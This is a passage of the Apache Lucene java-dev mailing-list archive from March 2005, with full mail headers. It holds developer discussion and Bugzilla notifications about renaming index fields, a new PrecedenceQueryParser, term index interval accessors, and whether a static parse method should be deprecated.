Web ___|||__|| \| || | Embedded Unix, System Integration http://www.sigram.com Contact: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 18:06:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18648 invoked from network); 7 Mar 2005 18:06:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 18:06:04 -0000 Received: (qmail 25997 invoked by uid 500); 7 Mar 2005 18:06:03 -0000 Delivered-To: [email protected] Received: (qmail 25550 invoked by uid 500); 7 Mar 2005 18:06:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25533 invoked by uid 99); 7 Mar 2005 18:06:02 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc13.comcast.net (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 10:06:01 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc13) with ESMTP id <200503071805590150046gf7e>; Mon, 7 Mar 2005 18:05:59 +0000 Message-ID: <[email protected]> Date: Mon, 07 Mar 2005 10:05:59 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: renaming fields in index References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Andrzej Bialecki wrote: > Doug Cutting wrote: > >> You cannot easily change the field names in the index. > > ..through the existing API, that is. Because you can change the content > of the *.fnm file appropriately, right? Right. One could write something that would re-write all of the .fnm files. It would need to check that you don't try to rename two fields to be the same (since that would require re-writing the full segment). It would also need to lock segments for write. Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 18:31:53 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31197 invoked from network); 7 Mar 2005 18:31:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 18:31:52 -0000 Received: (qmail 70583 invoked by uid 500); 7 Mar 2005 18:31:52 -0000 Delivered-To: [email protected] Received: (qmail 70122 invoked by uid 500); 7 Mar 2005 18:31:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70107 invoked by uid 500); 7 Mar 2005 18:31:50 -0000 Delivered-To: [email protected] Received: (qmail 70103 invoked by uid 99); 7 Mar 2005 18:31:50 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 10:31:50 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j27IVlYO012600 for <[email protected]>; Mon, 7 Mar 2005 19:31:47 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j27IVlCE012598; Mon, 7 Mar 2005 19:31:47 +0100 Date: Mon, 7 Mar 2005 19:31:47 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 25820] - [PATCH] QueryParser not handling queries containing AND and OR X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=25820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=25820 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- AssignedTo|lucene- |[email protected] |[email protected] |m Status|ASSIGNED |NEW ------- Additional Comments From [email protected] 2005-03-07 19:31 ------- I have created a PrecedenceQueryParser in Lucene's trunk repository. This implements the precedence with AND/OR as desired with AND taking a higher precedence, and also seems to deal nicely with the edge cases mentioned in the comments of this issue such that A OR B C translates to A B C. Let me know if PQP is acceptable and I'll make the switch and rename it to QueryParser moving the old QueryParser to OldQueryParser and deprecating it in case anyone needs the previous behavior. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 22:17:29 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54796 invoked from network); 7 Mar 2005 22:17:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 22:17:29 -0000 Received: (qmail 39187 invoked by uid 500); 7 Mar 2005 22:17:27 -0000 Delivered-To: [email protected] Received: (qmail 39144 invoked by uid 500); 7 Mar 2005 22:17:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 39121 invoked by uid 500); 7 Mar 2005 22:17:26 -0000 Delivered-To: [email protected] Received: (qmail 39116 invoked by uid 99); 7 Mar 2005 22:17:25 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 14:17:24 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j27MHL7u025480 for <[email protected]>; Mon, 7 Mar 2005 23:17:21 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j27MHLTu025475; Mon, 7 Mar 2005 23:17:21 +0100 Date: Mon, 7 Mar 2005 23:17:21 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33884] New: - [PATCH] add term index interval accessors X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33884>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33884 Summary: [PATCH] add term index interval accessors Product: Lucene Version: unspecified Platform: PC OS/Version: Windows XP Status: NEW Severity: normal Priority: P2 Component: Index AssignedTo: [email protected] ReportedBy: [email protected] It should be possible for folks to set the index interval used when writing indexes. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 07 22:19:19 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56219 invoked from network); 7 Mar 2005 22:19:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 7 Mar 2005 22:19:18 -0000 Received: (qmail 42672 invoked by uid 500); 7 Mar 2005 22:19:17 -0000 Delivered-To: [email protected] Received: (qmail 42393 invoked by uid 500); 7 Mar 2005 22:19:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42379 invoked by uid 500); 7 Mar 2005 22:19:16 -0000 Delivered-To: [email protected] Received: (qmail 42376 invoked by uid 99); 7 Mar 2005 22:19:16 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 07 Mar 2005 14:19:15 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j27MJCdr025658 for <[email protected]>; Mon, 7 Mar 2005 23:19:12 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j27MJCEB025656; Mon, 7 Mar 2005 23:19:12 +0100 Date: Mon, 7 Mar 2005 23:19:12 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33884] - [PATCH] add term index interval accessors X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33884>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33884 ------- Additional Comments From [email protected] 2005-03-07 23:19 ------- Created an attachment (id=14421) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14421&action=view) patch to add accessors for term index interval -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 02:22:03 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3846 invoked from network); 9 Mar 2005 02:22:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 02:22:03 -0000 Received: (qmail 79161 invoked by uid 500); 9 Mar 2005 02:22:02 -0000 Delivered-To: [email protected] Received: (qmail 79132 invoked by uid 500); 9 Mar 2005 02:22:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79117 invoked by uid 500); 9 Mar 2005 02:22:01 -0000 Delivered-To: [email protected] Received: (qmail 79111 invoked by uid 99); 9 Mar 2005 02:22:01 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 08 Mar 2005 18:21:59 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j292LvmI027734 for <[email protected]>; Wed, 9 Mar 2005 03:21:57 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j292Luju027732; Wed, 9 Mar 2005 03:21:56 +0100 Date: Wed, 9 Mar 2005 03:21:56 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33835] - Object reference error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33835>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33835 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |INVALID ------- Additional Comments From [email protected] 2005-03-09 03:21 ------- Even if the code in that function is the same, the bug may be elsewhere in the .Net port. For instance, it could be in that Peek() or that Doc() method. I suggest you check with the dotLucene/Lucene.Net authors. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 08:58:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76313 invoked from network); 9 Mar 2005 08:58:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 08:58:08 -0000 Received: (qmail 82392 invoked by uid 500); 9 Mar 2005 08:58:06 -0000 Delivered-To: [email protected] Received: (qmail 82236 invoked by uid 500); 9 Mar 2005 08:58:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82221 invoked by uid 99); 9 Mar 2005 08:58:05 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO,SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from moutng.kundenserver.de (HELO moutng.kundenserver.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 00:58:03 -0800 Received: from [161.129.204.104] (helo=mrelayng.kundenserver.de) by moutng.kundenserver.de with esmtp (Exim 3.35 #1) id 1D8x0z-0003gI-00 for [email protected]; Wed, 09 Mar 2005 09:58:01 +0100 Received: from [161.129.204.104] (helo=voodoo.federation.net) by mrelayng.kundenserver.de with asmtp (TLSv1:RC4-MD5:128) (Exim 3.35 #1) id 1D8x0z-00032D-00 for [email protected]; Wed, 09 Mar 2005 09:58:01 +0100 From: Daniel Naber <[email protected]> To: [email protected] Subject: Re: svn commit: r156600 - in lucene/java/trunk/src: java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.java java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.jj test/org/apache/lucene/queryParser/precedence/TestPrecedenceQueryParser.java Date: Wed, 9 Mar 2005 09:57:59 +0100 User-Agent: KMail/1.7.1 References: <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="utf-8" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <[email protected]> X-Provags-ID: kundenserver.de [email protected] auth:94b5a5949d2eb00693e70b0c89be5163 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Wednesday 09 March 2005 04:21, [email protected] wrote: > remove pesky static parse method that stymies flexibility That will make it difficult to make this the new default parser (i.e. rename it toQueryParser) as people will get a compile error then. Instead it should be deprecated (but I'm not sure why this method is a problem... I think it's often handy). Regards Daniel --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 09:52:14 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 628 invoked from network); 9 Mar 2005 09:52:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 09:52:14 -0000 Received: (qmail 67438 invoked by uid 500); 9 Mar 2005 09:52:12 -0000 Delivered-To: [email protected] Received: (qmail 67416 invoked by uid 500); 9 Mar 2005 09:52:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67401 invoked by uid 99); 9 Mar 2005 09:52:12 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 01:52:11 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id A1C1013E2007; Wed, 9 Mar 2005 04:52:09 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id C8C5013E200A for <[email protected]>; Wed, 9 Mar 2005 04:52:05 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: svn commit: r156600 - in lucene/java/trunk/src: java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.java java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.jj test/org/apache/lucene/queryParser/precedence/TestPrecedenceQueryParser.java Date: Wed, 9 Mar 2005 04:52:02 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 9, 2005, at 3:57 AM, Daniel Naber wrote: > On Wednesday 09 March 2005 04:21, [email protected] wrote: > >> remove pesky static parse method that stymies flexibility > > That will make it difficult to make this the new default parser (i.e. > rename > it toQueryParser) as people will get a compile error then. Instead it > should > be deprecated (but I'm not sure why this method is a problem... I > think it's > often handy). Ok, I'll add it back as deprecated when its renamed to QueryParser. It's a nuisance to have that static method when making a subclass of QueryParser - since static methods are not overridable it would be easy to mistakenly call the parent static parse method which would instantiate QueryParser rather than QueryParserSubclass. It's easy enough for someone to create their own utility convenience method to call to QueryParser or a custom subclass. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 14:38:49 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90128 invoked from network); 9 Mar 2005 14:38:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 14:38:16 -0000 Received: (qmail 9933 invoked by uid 500); 9 Mar 2005 14:38:02 -0000 Delivered-To: [email protected] Received: (qmail 9869 invoked by uid 500); 9 Mar 2005 14:38:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9848 invoked by uid 99); 9 Mar 2005 14:38:01 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO,SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from moutng.kundenserver.de (HELO moutng.kundenserver.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 06:37:59 -0800 Received: from [161.129.204.104] (helo=mrelayng.kundenserver.de) by moutng.kundenserver.de with esmtp (Exim 3.35 #1) id 1D92Jx-0003Bn-00 for [email protected]; Wed, 09 Mar 2005 15:37:57 +0100 Received: from [161.129.204.104] (helo=voodoo.federation.net) by mrelayng.kundenserver.de with asmtp (TLSv1:RC4-MD5:128) (Exim 3.35 #1) id 1D92Jx-0007Dc-00 for [email protected]; Wed, 09 Mar 2005 15:37:57 +0100 From: Daniel Naber <[email protected]> To: [email protected] Subject: Re: svn commit: r156600 - in lucene/java/trunk/src: java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.java java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.jj test/org/apache/lucene/queryParser/precedence/TestPrecedenceQueryParser.java Date: Wed, 9 Mar 2005 15:37:56 +0100 User-Agent: KMail/1.7.1 References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <[email protected]> X-Provags-ID: kundenserver.de [email protected] auth:94b5a5949d2eb00693e70b0c89be5163 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Wednesday 09 March 2005 10:52, Erik Hatcher wrote: > It's a nuisance to have that static method when making a subclass of > QueryParser - since static methods are not overridable it would be easy > to mistakenly call the parent static parse method which would > instantiate QueryParser rather than QueryParserSubclass. Sorry, I still don't understand: I just implemented MyQueryParser which extends QueryParser as a test that has a method static public Query parse(String expression, String field, Analyzer analyzer). When I call MyQueryParser.parse(...), my method is called, as I would have expected. regards Daniel --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 17:58:57 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72157 invoked from network); 9 Mar 2005 17:58:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 17:58:57 -0000 Received: (qmail 1894 invoked by uid 500); 9 Mar 2005 17:58:55 -0000 Delivered-To: [email protected] Received: (qmail 1862 invoked by uid 500); 9 Mar 2005 17:58:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1848 invoked by uid 99); 9 Mar 2005 17:58:54 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 09:58:53 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id B6BDB13E200A; Wed, 9 Mar 2005 12:58:51 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id A999413E2007 for <[email protected]>; Wed, 9 Mar 2005 12:58:48 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: svn commit: r156600 - in lucene/java/trunk/src: java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.java java/org/apache/lucene/queryParser/precedence/PrecedenceQueryParser.jj test/org/apache/lucene/queryParser/precedence/TestPrecedenceQueryParser.java Date: Wed, 9 Mar 2005 12:58:44 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.3 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 9, 2005, at 9:37 AM, Daniel Naber wrote: > On Wednesday 09 March 2005 10:52, Erik Hatcher wrote: > >> It's a nuisance to have that static method when making a subclass of >> QueryParser - since static methods are not overridable it would be >> easy >> to mistakenly call the parent static parse method which would >> instantiate QueryParser rather than QueryParserSubclass. > > Sorry, I still don't understand: I just implemented MyQueryParser which > extends QueryParser as a test that has a method static public Query > parse(String expression, String field, Analyzer analyzer). When I call > MyQueryParser.parse(...), my method is called, as I would have > expected. Sorry for the confusion - yes, you're absolutely right. static methods don't get overridden but they "hide" the superclass method. I still feel that static methods are more trouble than they are worth for a query parser, but it's not a huge deal. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 18:35:16 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94283 invoked from network); 9 Mar 2005 18:35:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 18:35:15 -0000 Received: (qmail 71618 invoked by uid 500); 9 Mar 2005 18:35:13 -0000 Delivered-To: [email protected] Received: (qmail 71598 invoked by uid 500); 9 Mar 2005 18:35:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71585 invoked by uid 500); 9 Mar 2005 18:35:13 -0000 Delivered-To: [email protected] Received: (qmail 71582 invoked by uid 99); 9 Mar 2005 18:35:13 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 10:35:12 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j29IZ9FR017399 for <[email protected]>; Wed, 9 Mar 2005 19:35:09 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j29IZ9Jo017397; Wed, 9 Mar 2005 19:35:09 +0100 Date: Wed, 9 Mar 2005 19:35:09 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33848] - ArrayIndexOutOfBoundsException when using MultiFieldQueryParser X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33848>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33848 ------- Additional Comments From [email protected] 2005-03-09 19:35 ------- Could you please either check if the problem persists with the latest version from subversion or submit a small test case that makes this easy to reproduce? -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 09 18:58:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11792 invoked from network); 9 Mar 2005 18:58:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Mar 2005 18:58:45 -0000 Received: (qmail 33580 invoked by uid 500); 9 Mar 2005 18:58:42 -0000 Delivered-To: [email protected] Received: (qmail 33555 invoked by uid 500); 9 Mar 2005 18:58:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33541 invoked by uid 500); 9 Mar 2005 18:58:41 -0000 Delivered-To: [email protected] Received: (qmail 33538 invoked by uid 99); 9 Mar 2005 18:58:41 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 09 Mar 2005 